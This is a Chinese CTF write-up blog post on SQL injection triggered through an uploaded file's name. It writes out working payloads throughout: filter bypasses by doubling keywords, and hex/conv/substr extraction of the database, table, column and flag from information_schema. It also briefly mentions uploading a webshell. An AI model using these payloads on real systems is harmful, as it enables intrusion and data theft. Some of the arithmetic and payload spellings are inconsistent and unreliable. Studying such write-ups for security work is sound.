存在于文件名中的SQL手工注入

SQL注入已经在前一章为大家介绍了个大概,本文将讲述我遇到的本以为是文件上传漏洞,却是以文件名触发的SQL注入!

本文分享的内容同样来自于一道CTF题!

1. 直接进入正题

      (1) 初步探测

       先看一下主页面(题目需要注册登录,这里直接跳过了)

       

        就这个页面,我不知道你看到的时候会怎么认为,我的第一想法就是他一定是一个文件上传漏洞拿flag。于是我开始了我得上传之旅,一开始还是有一些欣喜,觉得超简单的一道题:文件上传拿shell就完事了。于是通过burp抓包,修改请求头,成功的将小马上传到了服务器(这里不多解释,文件上传以后再和大家分享)。却发现根本无法获得文件所在路径,也就是只能上传,却无法利用。

        小结:当思考网站是否为文件上传漏洞时,不仅仅要考虑是否能上传木马文件,还要考虑文件被上传到服务器以后,文件所在的位置,也就是能否被利用。(本题大牛应该直接就能发现不是文件上传,因为根本无法获得上传文件所在路径)

   (2)尝试进行SQL注入

        没办法只能继续寻找漏洞所在,再来看一下上传了几个文件之后的网站:

 

         在页面(上图)中可以清楚地看到已经上传的文件(名)。这说明文件被上传到了数据库中,同时浏览器从数据库中读取了上传的文件,那么这个过程就有可能触发SQL注入。于是在文件名中先尝试输入select database() 命令(我认为现在没必要直接去探测数据库逻辑,构造可执行的SQL语句,不过你也可以直接构造能在服务器可SQL语句格式)并上传。

 

         你会发现当文件名为select database().jpg的时候,输出的文件名为database().jpg。而当输入文件名为aaa database().jpg时,输出的文件名也为aaa database().jpg。那么就可判断,服务器将select过滤了,然后在尝试其他命令,发现from也被过滤掉了。(select database()是暴数据库名的一种方式)

   (3)尝试绕过

        既然服务器将select命令过滤掉了,那说名一定有猫腻,那么就尝试绕过。

        首先尝试解决select和from被过滤的问题,我尝试了编码方式,发现服务器返回信息没有解码,这说明编码后在数据库中不能将其转变成命令执行,因此不可行。然后尝双写(也是一种常见的绕过方式)。惊喜的发现selselectect可以成功绕过。同样frfromom也能成功绕过。

        由以上得出结论服务器可能存在SQL注入。(因为在文件名中过滤掉了select 和from两个常用SQL命令,并成功绕过了过滤)

 2. 确定文件名触发SQL注入

解决了过滤,我盟来构造一下能够被数据库执行的SQL语句,

(1) 猜测服务器通过命令:insert into  表名('filename',...)  values('你上传的文件名',...);来将数据存储到数据库。

(2) 构造语句:'+(selselectect database())+' 。

(3) 拼接后的sql语句为:insert into  表名('filename',...) values('文件名'+(selselectect cdatabase())+'.jpg',...);

因此尝试   1'+(selselectect database())+'.jpg 。服务器返回0,说明SQL语句被执行了,但无法输出执行结果。

 

3. 开始操作

       首先考虑是返回数据时数据被过滤掉了,尝试改为输出十六进制,'+(selselectect hex(database()))+'.jpg 。服务器返回" 7765625 "。

        7765625解码为" web "。(貌似成功注入)这里我当时也是信誓旦旦的以为完成了,可以进一步猜表猜字段了。

        但是要注意的是本题还设置了一种截断,即:插入数据库文件名中如果包括SQL语句,那么在返回信息时,服务器将对字母进行截断(某些特殊字符也会截断或过滤)。这是一个很大的坑,但是如果你经验丰富可能很容易发现这个截断,判断依据如下:

         因为当你构造的文件名为  '+(selselectect hex(database()))+'.jpg 。服务器返回" 7765625 "。而输入 111'+(selselectect hex(database()))+'.jpg 时,返回的信息为765736 (=7765625+111)。

         但输入 a111'+(selselectect hex(database()))+'.jpg 时,仍返回7765625。

        因此即可以说明命令:1'+(selselectect hex(database()))+'.jpg的返回值为什么为0(因为返回数据是字符,不是数值,因此只能返回0)。也可以判断服务器进行了字符(英文字母等)截断。 

        解决办法是:尝试其他进制表示。二进制表示失败(可能是服务器设置问题,我也没咋弄清楚为啥二进制返回0)。于是使用conv命令,将16进制转换为10进制:CONV(N,from_base,to_base)   N是要转换的数据,from_base是原进制,to_base是目标进制。

      (1) 构造命令:'+(selselectect conv(hex(database()),16,10))+'.jpg 。返回一个带小数点的数值。

         这是因为返回值太大,系统使用科学计数法(xx e xxxxx)表示,因此使用substr做长度限制。substr(str,pos,len)  str字符串,从pos开始的位置,截取len个字符(空白也算字符)。

       (2) 构造命令:'+(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg ,(经过不断测试发现长度最大为12,长度大于12返回值就会以科学计数法表示)返回10进制数:131277325825392 转化为16进制为7765625f7570,转换成字符:web_up(Unicode编码:12个字节相当于6个字符)

            构造命令'+(selselectect conv(substr(hex(database()),13,25),16,10))+ '.jpg ,返回10进制数:1819238756 转化为16进制为6c6f6164,转换成字符:load

            得到数据库名:web_upload

         (3) 得到数据库名,那么就可以猜表名了。

            构造命令: '+(selselectect+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,12),16,10))+'.jpg

             '+(selselectect+conv(substr(hex((selselectect table_name frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),13,12),16,10))+'.jpg

            通过改变substr的参数,最后将得到的字符连接得到表名:hello_flag_is_here

         (4) 得到表名,那么猜字段。

            构造命令: '+(seleselectect+conv(substr(hex((selselectect COLUMN_NAME frfromom information_schema.COLUMNS where TABLE_NAME = 'hello_flag_is_here' limit 1,1)),1,12),16,10))+'.jpg

            通过改变substr的参数,最后将得到的字符连接得到字段:i_am_flag

          (5) CTF的宗旨,可以拿flag了。

            构造命令: '+(selselectect+CONV(substr(hex((seselectlect i_am_flag frfromom hello_flag_is_here limit 0,1)),1,12),16,10))+'.jpg

            通过改变substr的参数,最后将得到的字符连接得到flag。 拿到flag,注入完成。

      具体暴库过程,可参考上一篇文章

4. 总结

知识点:

         文件上传,不仅要注意是否能上传,还要考虑文件位置。文件是否能够被利用。

         与数据库交互并回显,有可能触发SQL注入。

          SQL语句重写绕过。

          SQL语句的巧妙构造。

         编码转换的巧妙运用。

本文供安全人员参考。以上是小白给大家的经验分享,望大佬们多多指教 Thank You !

posted @ 2019-08-16 09:54  Smile-exp  阅读(1558)  评论(1编辑  收藏  举报